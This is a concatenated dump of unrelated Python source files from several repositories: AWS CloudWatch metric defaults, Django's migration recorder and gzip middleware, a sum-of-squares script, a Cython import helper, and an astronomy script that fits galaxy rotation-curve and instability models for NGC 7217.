You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Documentation strings format
__docformat__ = "restructuredtext en"
|
chenziliang/aws-meta-snaps
|
refs/heads/develop
|
snaps/cloudwatch_defaults.py
|
1
|
CLOUDWATCH_DEFAULT_METRICS = {
"AWS/AutoScaling": [
"GroupDesiredCapacity",
"GroupInServiceInstances",
"GroupMaxSize",
"GroupMinSize",
"GroupPendingInstances",
"GroupStandbyInstances",
"GroupTerminatingInstances",
"GroupTotalInstances"
],
"AWS/Billing": [
"EstimatedCharges"
],
"AWS/CloudFront": [
"4xxErrorRate",
"5xxErrorRate",
"BytesDownloaded",
"BytesUploaded",
"Requests",
"TotalErrorRate"
],
"AWS/CloudSearch": [
"IndexUtilization",
"Partitions",
"SearchableDocuments",
"SuccessfulRequests"
],
"AWS/DynamoDB": [
"ConditionalCheckFailedRequests",
"ConsumedReadCapacityUnits",
"ConsumedWriteCapacityUnits",
"OnlineIndexConsumedWriteCapacity",
"OnlineIndexPercentageProgress",
"OnlineIndexThrottleEvents",
"ProvisionedReadCapacityUnits",
"ProvisionedWriteCapacityUnits",
"ReadThrottleEvents",
"ReturnedBytes",
"ReturnedItemCount",
"ReturnedRecordsCount",
"SuccessfulRequestLatency",
"SystemErrors",
"ThrottledRequests",
"UserErrors",
"WriteThrottleEvents"
],
"AWS/EBS": [
"BurstBalance",
"VolumeConsumedReadWriteOps",
"VolumeIdleTime",
"VolumeQueueLength",
"VolumeReadBytes",
"VolumeReadOps",
"VolumeThroughputPercentage",
"VolumeTotalReadTime",
"VolumeTotalWriteTime",
"VolumeWriteBytes",
"VolumeWriteOps"
],
"AWS/EC2": [
"CPUCreditBalance",
"CPUCreditUsage",
"CPUUtilization",
"DiskReadBytes",
"DiskReadOps",
"DiskWriteBytes",
"DiskWriteOps",
"NetworkIn",
"NetworkOut",
"NetworkPacketsIn",
"NetworkPacketsOut",
"StatusCheckFailed",
"StatusCheckFailed_Instance",
"StatusCheckFailed_System"
],
"AWS/EC2Spot": [
"AvailableInstancePoolsCount",
"BidsSubmittedForCapacity",
"EligibleInstancePoolCount",
"FulfilledCapacity",
"MaxPercentCapacityAllocation",
"PendingCapacity",
"PercentCapacityAllocation",
"TargetCapacity",
"TerminatingCapacity"
],
"AWS/ECS": [
"CPUReservation",
"CPUUtilization",
"MemoryReservation",
"MemoryUtilization"
],
"AWS/ELB": [
"BackendConnectionErrors",
"HTTPCode_Backend_2XX",
"HTTPCode_Backend_3XX",
"HTTPCode_Backend_4XX",
"HTTPCode_Backend_5XX",
"HTTPCode_ELB_4XX",
"HTTPCode_ELB_5XX",
"HealthyHostCount",
"Latency",
"RequestCount",
"SpilloverCount",
"SurgeQueueLength",
"UnHealthyHostCount"
],
"AWS/ES": [
"AutomatedSnapshotFailure",
"CPUUtilization",
"ClusterStatus.green",
"ClusterStatus.red",
"ClusterStatus.yellow",
"DeletedDocuments",
"DiskQueueLength",
"FreeStorageSpace",
"JVMMemoryPressure",
"MasterCPUUtilization",
"MasterFreeStorageSpace",
"MasterJVMMemoryPressure",
"Nodes",
"ReadIOPS",
"ReadLatency",
"ReadThroughput",
"SearchableDocuments",
"WriteIOPS",
"WriteLatency",
"WriteThroughput"
],
"AWS/ElastiCache": [
"BytesReadIntoMemcached",
"BytesUsedForCache",
"BytesUsedForCacheItems",
"BytesUsedForHash",
"BytesWrittenOutFromMemcached",
"CPUUtilization",
"CacheHits",
"CacheMisses",
"CasBadval",
"CasHits",
"CasMisses",
"CmdConfigGet",
"CmdConfigSet",
"CmdFlush",
"CmdGet",
"CmdSet",
"CmdTouch",
"CurrConfig",
"CurrConnections",
"CurrItems",
"DecrHits",
"DecrMisses",
"DeleteHits",
"DeleteMisses",
"EvictedUnfetched",
"Evictions",
"ExpiredUnfetched",
"FreeableMemory",
"GetHits",
"GetMisses",
"GetTypeCmds",
"HashBasedCmds",
"HyperLogLogBasedCmds",
"IncrHits",
"IncrMisses",
"KeyBasedCmds",
"ListBasedCmds",
"NetworkBytesIn",
"NetworkBytesOut",
"NewConnections",
"NewItems",
"Reclaimed",
"ReplicationBytes",
"ReplicationLag",
"SaveInProgress",
"SetBasedCmds",
"SetTypeCmds",
"SlabsMoved",
"SortedSetBasedCmds",
"StringBasedCmds",
"SwapUsage",
"TouchHits",
"TouchMisses",
"UnusedMemory"
],
"AWS/ElasticMapReduce": [
"AppsCompleted",
"AppsFailed",
"AppsKilled",
"AppsPending",
"AppsRunning",
"AppsSubmitted",
"BackupFailed",
"CapacityRemainingGB",
"Cluster",
"ContainerAllocated",
"ContainerPending",
"ContainerReserved",
"CoreNodesPending",
"CoreNodesRunning",
"CorruptBlocks",
"DfsPendingReplicationBlocks",
"HBase",
"HDFSBytesRead",
"HDFSBytesWritten",
"HDFSUtilization",
"HbaseBackupFailed",
"IO",
"IsIdle",
"JobsFailed",
"JobsRunning",
"LiveDataNodes",
"LiveTaskTrackers",
"MRActiveNodes",
"MRDecommissionedNodes",
"MRLostNodes",
"MRRebootedNodes",
"MRTotalNodes",
"MRUnhealthyNodes",
"Map/Reduce",
"MapSlotsOpen",
"MapTasksRemaining",
"MapTasksRunning",
"MemoryAllocatedMB",
"MemoryAvailableMB",
"MemoryReservedMB",
"MemoryTotalMB",
"MissingBlocks",
"MostRecentBackupDuration",
"Node",
"PendingDeletionBlocks",
"ReduceSlotsOpen",
"ReduceTasksRemaining",
"ReduceTasksRunning",
"RemainingMapTasksPerSlot",
"S3BytesRead",
"S3BytesWritten",
"Status",
"TaskNodesPending",
"TaskNodesRunning",
"TimeSinceLastSuccessfulBackup",
"TotalLoad",
"UnderReplicatedBlocks"
],
"AWS/Events": [
"FailedInvocations",
"Invocations",
"MatchedEvents",
"ThrottledRules",
"TriggeredRules"
],
"AWS/Kinesis": [
"GetRecords.Bytes",
"GetRecords.IteratorAge",
"GetRecords.IteratorAgeMilliseconds",
"GetRecords.Latency",
"GetRecords.Success",
"IncomingBytes",
"IncomingRecords",
"PutRecord.Bytes",
"PutRecord.Latency",
"PutRecord.Success",
"PutRecords.Bytes",
"PutRecords.Latency",
"PutRecords.Records",
"PutRecords.Success"
],
"AWS/Lambda": [
"Duration",
"Errors",
"Invocations",
"Throttles"
],
"AWS/Logs": [
"DeliveryErrors",
"DeliveryThrottling",
"ForwardedBytes",
"ForwardedLogEvents",
"IncomingBytes",
"IncomingLogEvents"
],
"AWS/ML": [
"PredictCount",
"PredictFailureCount"
],
"AWS/OpsWorks": [
"cpu_idle",
"cpu_nice",
"cpu_system",
"cpu_user",
"cpu_waitio",
"load_1",
"load_15",
"load_5",
"memory_buffers",
"memory_cached",
"memory_free",
"memory_swap",
"memory_total",
"memory_used",
"procs"
],
"AWS/RDS": [
"BinLogDiskUsage",
"CPUCreditBalance",
"CPUCreditUsage",
"CPUUtilization",
"DatabaseConnections",
"DiskQueueDepth",
"FreeStorageSpace",
"FreeableMemory",
"NetworkReceiveThroughput",
"NetworkTransmitThroughput",
"ReadIOPS",
"ReadLatency",
"ReadThroughput",
"ReplicaLag",
"SwapUsage",
"WriteIOPS",
"WriteLatency",
"WriteThroughput"
],
"AWS/Redshift": [
"CPUUtilization",
"DatabaseConnections",
"HealthStatus",
"MaintenanceMode",
"NetworkReceiveThroughput",
"NetworkTransmitThroughput",
"PercentageDiskSpaceUsed",
"ReadIOPS",
"ReadLatency",
"ReadThroughput",
"WriteIOPS",
"WriteLatency",
"WriteThroughput"
],
"AWS/Route53": [
"ConnectionTime",
"HealthCheckPercentageHealthy",
"HealthCheckStatus",
"SSLHandshakeTime",
"TimeToFirstByte"
],
"AWS/S3": [
"BucketSizeBytes",
"NumberOfObjects"
],
"AWS/SNS": [
"NumberOfMessagesPublished",
"NumberOfNotificationsDelivered",
"NumberOfNotificationsFailed",
"PublishSize"
],
"AWS/SQS": [
"ApproximateNumberOfMessagesDelayed",
"ApproximateNumberOfMessagesNotVisible",
"ApproximateNumberOfMessagesVisible",
"NumberOfEmptyReceives",
"NumberOfMessagesDeleted",
"NumberOfMessagesReceived",
"NumberOfMessagesSent",
"SentMessageSize"
],
"AWS/SWF": [
"ActivityTaskScheduleToCloseTime",
"ActivityTaskScheduleToStartTime",
"ActivityTaskStartToCloseTime",
"ActivityTasksCanceled",
"ActivityTasksCompleted",
"ActivityTasksFailed",
"DecisionTaskScheduleToStartTime",
"DecisionTaskStartToCloseTime",
"DecisionTasksCompleted",
"ScheduledActivityTasksTimedOutOnClose",
"ScheduledActivityTasksTimedOutOnStart",
"StartedActivityTasksTimedOutOnClose",
"StartedActivityTasksTimedOutOnHeartbeat",
"StartedDecisionTasksTimedOutOnClose",
"WorkflowStartToCloseTime",
"WorkflowsCanceled",
"WorkflowsCompleted",
"WorkflowsContinuedAsNew",
"WorkflowsFailed",
"WorkflowsTerminated",
"WorkflowsTimedOut"
],
"AWS/StorageGateway": [
"CacheFree",
"CacheHitPercent",
"CachePercentDirty",
"CachePercentUsed",
"CacheUsed",
"CloudBytesDownloaded",
"CloudBytesUploaded",
"CloudDownloadLatency",
"QueuedWrites",
"ReadBytes",
"ReadTime",
"TimeSinceLastRecoveryPoint",
"TotalCacheSize",
"UploadBufferFree",
"UploadBufferPercentUsed",
"UploadBufferUsed",
"WorkingStorageFree",
"WorkingStoragePercentUsed",
"WorkingStorageUsed",
"WriteBytes",
"WriteTime"
],
"AWS/WAF": [
"AllowedRequests",
"BlockedRequests",
"CountedRequests"
],
"AWS/WorkSpaces": [
"Available",
"ConnectionAttempt",
"ConnectionFailure",
"ConnectionSuccess",
"InSessionLatency",
"Maintenance",
"SessionDisconnect",
"SessionLaunchTime",
"Unhealthy",
"UserConnected"
]
}
CLOUDWATCH_DEFAULT_DIMENSIONS = {
"AWS/AutoScaling": [
{
"AutoScalingGroupName": ".*"
}
],
"AWS/Billing": [
{
"Currency": ".*",
"LinkedAccount": ".*",
"ServiceName": ".*"
}
],
"AWS/CloudFront": [
{
"DistributionId": ".*",
"Region": ".*"
}
],
"AWS/CloudSearch": [
{
"ClientId": ".*",
"DomainName": ".*"
}
],
"AWS/DynamoDB": [
{
"GlobalSecondaryIndexName": ".*",
"Operation": ".*",
"StreamLabel": ".*",
"TableName": ".*"
}
],
"AWS/EBS": [
{
'VolumeId': '.*'
}
],
"AWS/EC2": [
{
"AutoScalingGroupName": ".*",
"ImageId": ".*",
"InstanceId": ".*",
"InstanceType": ".*"
}
],
"AWS/EC2Spot": [
{
"AvailabilityZone": ".*",
"FleetRequestId": ".*",
"InstanceType": ".*"
}
],
"AWS/ECS": [
{
"ClusterName": ".*",
"ServiceName": ".*"
}
],
"AWS/ELB": [
{
"AvailabilityZone": ".*",
"LoadBalancerName": ".*"
}
],
"AWS/ES": [
{
"ClientId": ".*",
"DomainName": ".*"
}
],
"AWS/ElastiCache": [
{
"CacheClusterId": ".*",
"CacheNodeId": ".*"
}
],
"AWS/ElasticMapReduce": [
{
"ClusterId/JobFlowId": ".*",
"JobId": ".*"
}
],
"AWS/Events": [
{
"RuleName": ".*"
}
],
"AWS/Kinesis": [
{
"StreamName": ".*"
}
],
"AWS/Lambda": [
{
"FunctionName": ".*",
"Resource": ".*"
}
],
"AWS/Logs": [
{
"DestinationType": ".*",
"FilterName": ".*",
"LogGroupName": ".*"
}
],
"AWS/ML": [
{
"MLModelId": ".*",
"RequestMode": ".*"
}
],
"AWS/OpsWorks": [
{
"InstanceId": ".*",
"LayerId": ".*",
"StackId": ".*"
}
],
"AWS/RDS": [
{
"DBClusterIdentifier": ".*",
"DBInstanceIdentifier": ".*",
"DatabaseClass": ".*",
"EngineName": ".*"
}
],
"AWS/Redshift": [
{
"ClusterIdentifier": ".*",
"NodeID": ".*"
}
],
"AWS/Route53": [
{
"HealthCheckId": ".*",
"Region": ".*"
}
],
"AWS/S3": [
{
"BucketName": ".*",
"StorageType": ".*"
}
],
"AWS/SNS": [
{
"Application": ".*",
"Platform": ".*",
"TopicName": ".*"
}
],
"AWS/SQS": [
{
"QueueName": ".*"
}
],
"AWS/SWF": [
{
"ActivityTypeName": ".*",
"ActivityTypeVersion": ".*",
"Domain": ".*",
"WorkflowTypeName": ".*",
"WorkflowTypeVersion": ".*"
}
],
"AWS/StorageGateway": [
{
"GatewayId": ".*",
"GatewayName": ".*",
"VolumeId": ".*"
}
],
"AWS/WAF": [
{
"Rule": ".*",
"WebACL": ".*"
}
],
"AWS/WorkSpaces": [
{
"DirectoryId": ".*",
"WorkspaceId": ".*"
}
]
}
|
wfxiang08/django197
|
refs/heads/master
|
django/db/migrations/recorder.py
|
478
|
from __future__ import unicode_literals
from django.apps.registry import Apps
from django.db import models
from django.db.utils import DatabaseError
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now
from .exceptions import MigrationSchemaMissing
class MigrationRecorder(object):
"""
Deals with storing migration records in the database.
Because this table is actually itself used for dealing with model
creation, it's the one thing we can't do normally via migrations.
We manually handle table creation/schema updating (using schema backend)
and then have a floating model to do queries with.
If a migration is unapplied its row is removed from the table. Having
a row in the table always means a migration is applied.
"""
@python_2_unicode_compatible
class Migration(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField(default=now)
class Meta:
apps = Apps()
app_label = "migrations"
db_table = "django_migrations"
def __str__(self):
return "Migration %s for %s" % (self.name, self.app)
def __init__(self, connection):
self.connection = connection
@property
def migration_qs(self):
return self.Migration.objects.using(self.connection.alias)
def ensure_schema(self):
"""
Ensures the table exists and has the correct schema.
"""
# If the table's there, that's fine - we've never changed its schema
# in the codebase.
if self.Migration._meta.db_table in self.connection.introspection.table_names(self.connection.cursor()):
return
# Make the table
try:
with self.connection.schema_editor() as editor:
editor.create_model(self.Migration)
except DatabaseError as exc:
raise MigrationSchemaMissing("Unable to create the django_migrations table (%s)" % exc)
def applied_migrations(self):
"""
Returns a set of (app, name) of applied migrations.
"""
self.ensure_schema()
return set(tuple(x) for x in self.migration_qs.values_list("app", "name"))
def record_applied(self, app, name):
"""
Records that a migration was applied.
"""
self.ensure_schema()
self.migration_qs.create(app=app, name=name)
def record_unapplied(self, app, name):
"""
Records that a migration was unapplied.
"""
self.ensure_schema()
self.migration_qs.filter(app=app, name=name).delete()
def flush(self):
"""
Deletes all migration records. Useful if you're testing migrations.
"""
self.migration_qs.all().delete()
|
ProjectivePlane/hello-world
|
refs/heads/master
|
sumsquares.py
|
1
|
#!/usr/bin/python
import math
Max=10000
squareSet=set()
for n in xrange(1,int(math.sqrt(Max)+1)):
squareSet.add(n*n)
for m in xrange(1,Max+1):
for n in squareSet:
k=m-n
if k in squareSet and k<=n:
print m,"=",n,"+",k
|
nycholas/ask-undrgz
|
refs/heads/master
|
src/ask-undrgz/django/middleware/gzip.py
|
321
|
import re
from django.utils.text import compress_string
from django.utils.cache import patch_vary_headers
re_accepts_gzip = re.compile(r'\bgzip\b')
class GZipMiddleware(object):
"""
This middleware compresses content if the browser allows gzip compression.
It sets the Vary header accordingly, so that caches will base their storage
on the Accept-Encoding header.
"""
def process_response(self, request, response):
# It's not worth compressing non-OK or really short responses.
if response.status_code != 200 or len(response.content) < 200:
return response
patch_vary_headers(response, ('Accept-Encoding',))
# Avoid gzipping if we've already got a content-encoding.
if response.has_header('Content-Encoding'):
return response
# MSIE have issues with gzipped respones of various content types.
if "msie" in request.META.get('HTTP_USER_AGENT', '').lower():
ctype = response.get('Content-Type', '').lower()
if not ctype.startswith("text/") or "javascript" in ctype:
return response
ae = request.META.get('HTTP_ACCEPT_ENCODING', '')
if not re_accepts_gzip.search(ae):
return response
response.content = compress_string(response.content)
response['Content-Encoding'] = 'gzip'
response['Content-Length'] = str(len(response.content))
return response
|
jesuscript/topo-mpi
|
refs/heads/cleanmpi
|
topo/misc/pyxhandler.py
|
2
|
"""
Support for optional Cython .pyx files.
$Id$
"""
# CEBENHANCEMENT: If we begin using Cython components, consider adding
# more features of inlinec.py (ie: test of Cython compilation, control
# over warnings).
# CEBALERT: currently, need to do something like
# "export C_INCLUDE_PATH=lib/python2.6/site-packages/numpy/core/include/"
# for cython to find numpy headers. Might need to fix pyximport to look
# in the right place (it's possible to ask numpy for the location).
import __main__
import_pyx = __main__.__dict__.get('import_pyx',False)
pyximported = False
if import_pyx:
try:
import pyximport
pyximport.install()
pyximported = True
except:
pass
# JABALERT: As for the version in inlinec, I can't see any reason why
# this function accepts names rather than the more pythonic option of
# accepting objects, from which names can be extracted if necessary.
def provide_unoptimized_equivalent_cy(optimized_name, unoptimized_name, local_dict):
"""
Replace the optimized Cython component with its unoptimized
equivalent if pyximport is not available.
If import_pyx is True, warns about the unavailable component.
"""
if not pyximported:
local_dict[optimized_name] = local_dict[unoptimized_name]
if import_pyx:
print '%s: Cython components not available; using %s instead of %s.' \
% (local_dict['__name__'], unoptimized_name, optimized_name)
|
Amarchuk/2FInstability
|
refs/heads/master
|
core/n7217.py
|
1
|
__author__ = 'amarch'
# -*- coding: utf-8 -*-
import time
import shutil
from main import *
def correctGasData(r_g1, v_g1, dv_g1):
'''Функция, куда убраны все операции подгонки с данными по газу.'''
r_g = r_g1
v_g = v_g1
dv_g = dv_g1
#Если необходимо выпрямить апроксимацию на краю - можно добавить несколько последних точек,
#это должно помочь сгладить. Или обрезать по upperBord.
upperBord = 200
r_g, v_g, dv_g = zip(*(filter(lambda x: x[0] < upperBord, zip(r_g, v_g, dv_g))))
r_g = list(r_g)
v_g = list(v_g)
dv_g = list(dv_g)
# multiplate = 5
# addition_points = 2
# r_points = heapq.nlargest(addition_points, r_g)
# v_points = []
# dv_points = []
# for po in r_points:
# v_points.append(v_g[r_g.index(po)])
# dv_points.append(dv_g[r_g.index(po)])
# r_g = r_g + [i[0] + scale * i[1] for i in zip(r_points * multiplate, range(1, multiplate * addition_points + 1))]
# v_g = v_g + v_points * multiplate
# dv_g = dv_g + dv_points * multiplate
r_g = r_g + [i[0] + scale * i[1] for i in zip(r_points * add_points, range(1, add_points + 1))]
v_g = v_g + v_points * add_points
dv_g = dv_g + dv_points * add_points
return r_g, v_g, dv_g
def correctStarData(r_ma1, v_ma1, dv_ma1):
'''Корректировка данных по звездам.'''
r_ma = r_ma1
v_ma = v_ma1
dv_ma = dv_ma1
#Если необходимо выпрямить апроксимацию на краю - можно добавить несколько последних точек,
#это должно помочь сгладить. Или обрезать по upperBord.
# upperBord = 3000
# r_ma, v_ma = zip(*(filter(lambda x: x[0] < upperBord, zip(r_ma, v_ma))))
# r_ma = list(r_ma)
# v_ma = list(v_ma)
#
# multiplate = 5
# addition_points = 3
# r_points = heapq.nlargest(addition_points, r_ma)
# v_points = []
# dv_points = []
# for po in r_points:
# v_points.append(v_ma[r_ma.index(po)])
# dv_points.append(dv_ma[r_ma.index(po)])
# r_ma = r_ma + [i[0] + scale * i[1] for i in zip(r_points * multiplate, range(1, multiplate * addition_points + 1))]
# v_ma = v_ma + v_points * multiplate
# dv_ma = dv_ma + dv_points * multiplate
add_points = 50
r_points = [75]
v_points = [221]
dv_points = [5]
r_ma = r_ma + [i[0] + scale * i[1] for i in zip(r_points * add_points, range(1, add_points + 1))]
v_ma = v_ma + v_points * add_points
dv_ma = dv_ma + dv_points * add_points
return r_ma, v_ma, dv_ma
def correctSigmaLosMaj(r_ma1, sig_los_ma1, dsig_los_ma1):
'''Корректируем данные по дисперсии скоростей вдоль главной оси. '''
# Если не сошлось - надо исправить начальное приближение гауссианы ниже:
x0 = array([0, 100, 5, 100])
# на случай если данные из разных источников в одном файле
r_ma, sig_los_ma, dsig_los_ma = map(list, zip(*sorted(zip(r_ma1, sig_los_ma1, dsig_los_ma1))))
# Можно обрезать в случае плохих краев
r_ma = r_ma[1:-1]
sig_los_ma = sig_los_ma[1:-1]
dsig_los_ma = dsig_los_ma[1:-1]
# #Если необходимо выпрямить апроксимацию на краю - можно добавить несколько последних точек,
# #это должно помочь сгладить.
#
multiplate = 10
addition_points = 1
r_points = heapq.nlargest(addition_points, r_ma)
sig_points = []
dsig_points = []
for po in r_points:
sig_points.append(sig_los_ma[r_ma.index(po)])
dsig_points.append(dsig_los_ma[r_ma.index(po)])
r_ma = r_ma + [i[0] + scale * i[1] for i in
zip(r_points * multiplate, arange(1, 3 * (multiplate * addition_points) + 1, 3))]
sig_los_ma = sig_los_ma + sig_points * multiplate
dsig_los_ma = dsig_los_ma + dsig_points * multiplate
return r_ma, sig_los_ma, dsig_los_ma, x0
def correctSigmaLosMin(r_ma1, sig_los_ma1, dsig_los_ma1):
'''Корректируем данные по дисперсии скоростей вдоль главной оси. '''
r_ma, sig_los_ma, dsig_los_ma = map(list, zip(*sorted(zip(r_ma1, sig_los_ma1, dsig_los_ma1))))
# Можно обрезать в случае плохих краев
r_ma = r_ma[1:-1]
sig_los_ma = sig_los_ma[1:-1]
dsig_los_ma = dsig_los_ma[1:-1]
# Если не сошлось - надо исправить начальное приближение гауссианы ниже:
x0 = array([0, 10, 5, 10])
#Если необходимо выпрямить апроксимацию на краю - можно добавить несколько последних точек,
#это должно помочь сгладить.
# multiplate = 10
# addition_points = 1
# r_points = heapq.nlargest(addition_points, r_ma)
# sig_points = []
# dsig_points = []
# for po in r_points:
# sig_points.append(sig_los_ma[r_ma.index(po)])
# dsig_points.append(dsig_los_ma[r_ma.index(po)])
# r_ma = r_ma + [i[0] + scale * i[1] for i in zip(r_points * multiplate, arange(1, 5*(multiplate * addition_points) + 1, 5))]
# sig_los_ma = sig_los_ma + sig_points * multiplate
# dsig_los_ma = dsig_los_ma + dsig_points * multiplate
return r_ma, sig_los_ma, dsig_los_ma, x0
startTime = time.time()
if __name__ == "__main__":
plt.rcParams.update({'font.size': 16})
path = '/home/amarch/Documents/RotationCurves/Diploma/TwoFluidInstAllDataFromSotn17Feb/Sample/RC/U11914_N7217'
name = 'U11914_N7217'
incl = 30 # according to Silchenko et al. 2011
scale = 1
resolution = 80 #pc/arcsec
h_disc = 36.8 # R-band
M_R = 10.38
M_B = 11.47
mu0_c_R = 19.91
r_eff_bulge = 26.2
pol_degree_star = 25
pol_degree_gas = 25
sig_pol_deg = 10
sig_pol_deg_mi = 12
Rmin = 20
Rmax = 115
M_to_L = 2.2
#Два диска и данные в полосе I
mu_1_I = 17.4
h_1 = 12.5
mu_2_I = 18.3
h_2 = 35.8
gas_corr_by_incl = False
di = 5
monte_carlo_realizations = 2
peculiarities = [26, 35, 70, 80]
maxDisc = 10.0
sig_wings = r_eff_bulge # откуда крылья для дисперсий фитировать
use_minor = False # используется ли дисперсия по малой оси
#Используем толстый диск в I
h_disc = h_2
if not os.path.exists(path+'/EQUAL_IBAND/'):
os.makedirs(path+'/EQUAL_IBAND/')
else:
for f in os.listdir(path+'/EQUAL_IBAND/'):
os.remove(path+'/EQUAL_IBAND/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/EQUAL_IBAND/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/EQUAL_IBAND/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/EQUAL_IBAND/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/EQUAL_IBAND/v_stars_mi.dat')
#EQUAL и I-band
mainf(PATH=path+'/EQUAL_IBAND',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=M_to_L,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='EQUAL',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=1)
renameFilesByMethod(path+'/EQUAL_IBAND/', 'EQUAL_IBAND')
if not os.path.exists(path+'/HALF_MAX/'):
os.makedirs(path+'/HALF_MAX/')
else:
for f in os.listdir(path+'/HALF_MAX/'):
os.remove(path+'/HALF_MAX/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/HALF_MAX/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/HALF_MAX/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/HALF_MAX/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/HALF_MAX/v_stars_mi.dat')
#HALF и Макс. диск
mainf(PATH=path+'/HALF_MAX',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=maxDisc,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='HALF',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=2)
renameFilesByMethod(path+'/HALF_MAX/', 'HALF_MAX')
if not os.path.exists(path+'/HALF_IBAND/'):
os.makedirs(path+'/HALF_IBAND/')
else:
for f in os.listdir(path+'/HALF_IBAND/'):
os.remove(path+'/HALF_IBAND/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/HALF_IBAND/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/HALF_IBAND/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/HALF_IBAND/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/HALF_IBAND/v_stars_mi.dat')
#HALF и I-band
mainf(PATH=path+'/HALF_IBAND',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=M_to_L,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='HALF',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=3)
renameFilesByMethod(path+'/HALF_IBAND/', 'HALF_IBAND')
if not os.path.exists(path+'/EQUAL_MAX/'):
os.makedirs(path+'/EQUAL_MAX/')
else:
for f in os.listdir(path+'/EQUAL_MAX/'):
os.remove(path+'/EQUAL_MAX/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/EQUAL_MAX/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/EQUAL_MAX/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/EQUAL_MAX/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/EQUAL_MAX/v_stars_mi.dat')
#EQUAL и Макс диск
mainf(PATH=path+'/EQUAL_MAX',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=maxDisc,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='EQUAL',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=4)
renameFilesByMethod(path+'/EQUAL_MAX/', 'EQUAL_MAX')
if not os.path.exists(path+'/AD_MAX/'):
os.makedirs(path+'/AD_MAX/')
else:
for f in os.listdir(path+'/AD_MAX/'):
os.remove(path+'/AD_MAX/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/AD_MAX/v_stars_ma.dat')
